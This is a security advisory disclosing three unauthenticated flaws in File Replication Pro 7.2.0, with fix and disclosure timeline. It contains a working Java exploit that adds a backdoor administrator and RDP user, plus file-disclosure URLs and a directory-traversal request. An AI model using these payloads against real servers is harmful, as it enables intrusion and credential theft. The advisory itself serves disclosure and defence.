VP2016-001 File Replication Pro Remote Command Execution

File Replication Pro (FRP)  is a file management solution that is used to back up and copy files from various nodes in the network. Vantage Point has discovered multiple vulnerabilities in FRP v7.2.0 (and possibly prior versions) that allow a remote unauthenticated malicious run arbitrary code with SYSTEM privileges. 

The vulnerabilities that were discovered are:

- Unauthenticated Remote Command Execution
- Unauthenticated Remote Arbitrary File Disclosure
- Unauthenticated Directory Traversal and File Listing

1. Unauthenticated Remote Command Execution

The backup agents implements a RPC service port 9200 that supports various calls, including a function called "ExecCommand" that unsurprisingly executes shell commands on the system. A password hash is used to authenticate calls on this interface (note that the hash itself and not the password is used for authentication). This hash can be obtained from the remote file disclosure vulnerability present in the software (listed below) and used to  authenticate to the RPC service, where subsequently, arbitrary commands are executed as the SYSTEM user.

POC Exploit Code of Malicious RPC Client:

/**
 * @author Jerold Hoong (Vantage Point Security)
 * File Replication Pro =< v7.2.0
 * Remote Command Execution PoC Working Exploit
 * www.vantagepoint.sg
 * NOTE: Include FRP libraries to compile
 */

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import net.diasoft.frp.engine.exception.RPCException;
import net.diasoft.frp.engine.model.AddressPort;
import net.diasoft.frp.engine.tcp.client.RPCDriver;
import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

    static String ip = "1.2.3.4";
    static int port = 9200;
    // password string can be retrieved from remote file disclosure vulnerability (configuration.xml)
    // If no password is set, input blank string for password
    // Use IE to navigate to <Target IP>:9200. OK = NO-AUTH, Error = AUTH

    static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=

    public static void main(String[] args) {

        AddressPort ap = new AddressPort(ip, port);
        AddressPort addresses[] = {ap};
        TCPConnection _tcp_connection = null;

        try {
            _tcp_connection = new TCPConnection(addresses, password, true);

        } catch (Exception e) {
            e.printStackTrace();
        }

        System.out.print("Connecting to host...");
        RPCDriver rpc = new RPCDriver(_tcp_connection);
        HashMap p = new HashMap();

        try {
            Map r = rpc.callFunction("ExecCommand", p);
            System.out.print("Success!\n");
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user
        System.out.print("Attempting to add user 'vantagepoint' with password 'LOLrofl1337!': ");
        p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user to Admin group
        System.out.print("Attempting to add user 'vantagepoint' to 'Administrators' group: ");
        p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        //add new user to RDP group
        System.out.print("Attempting to add user 'vantagepoint' to 'Remote Desktop Users' group:");
        p.put("COMMAND", "net localgroup \"Remote Desktop Users\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }
        System.out.print("\n\n---- END ----\n\n");

    }
}


2. Unauthenticated Remote Arbitrary File Disclosure

A flaw in File Replication Pro allows a malicious user to gain access to the contents of any file on the remote server. This leads to the compromise of sensitive information such as user accounts and password hashes, which can then be used to further exploit the server using other vulnerabilities in the software. An example of how to view File Replication Pro's web interface user accounts and credentials is shown below by accessing the following URLs:

http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\properties.xml
http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml


3. Unauthenticated Directory Traversal and File Listing

It was possible to anonymously view the file directory structure of the remote File Replication Pro management server as well as the file directory structure of all server nodes that are managed by the management server. The parameters that are used to construct the POST request in the example code below can be obtained via the remote file disclosure vulnerability by accessing File Replication Pro's configuration.xml, properties.xml and .frp_id files.

POST /GetRemoteDirList.jsp?server_name=WIN7SP1&server_key=WIN7SP1~29d919a3:150c736b708:-8000&server_role=Source&server_password=&parent_dir=../../../c:/ HTTP/1.1
Host: 127.0.0.1:9100
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:9100/AddEditJob.do?action=new
Cookie: show_greeting=value; JSESSIONID=81cgjqf795cai
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0


Fix Information

Upgrade to the latest version of File Replication Pro (currently 7.3.0).

Timeline

28 October 2015  - Vulnerabilities discovered
06 November 2015 - Vendor acknowledged and scheduled fixes to commence
02 February 2016 - Patch released by vendor
10 February 2016 - Release of this advisory to the public